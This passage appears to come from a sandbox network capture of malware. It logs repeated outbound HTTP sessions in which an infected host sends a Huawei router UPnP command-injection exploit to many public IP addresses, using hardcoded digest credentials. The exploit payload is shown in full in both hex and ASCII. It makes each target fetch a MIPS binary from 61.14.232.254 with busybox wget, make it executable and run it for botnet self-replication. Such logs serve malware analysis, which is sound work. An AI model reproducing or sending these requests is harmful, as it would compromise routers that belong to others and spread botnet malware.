3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2272192.168.2.134547841.178.36.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779742956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2273192.168.2.1355440210.90.249.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779756069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2274192.168.2.1351160157.85.62.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779792070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2275192.168.2.1342146197.60.169.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779794931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2276192.168.2.1354112197.32.186.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779829979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2277192.168.2.1360300197.147.161.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779845953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2278192.168.2.1335900157.225.208.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779863119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2279192.168.2.1335698117.225.113.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779884100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2280192.168.2.1345948157.168.155.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.779886961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2281192.168.2.1341158199.35.15.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782069921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2282192.168.2.134928641.216.62.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.782191038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
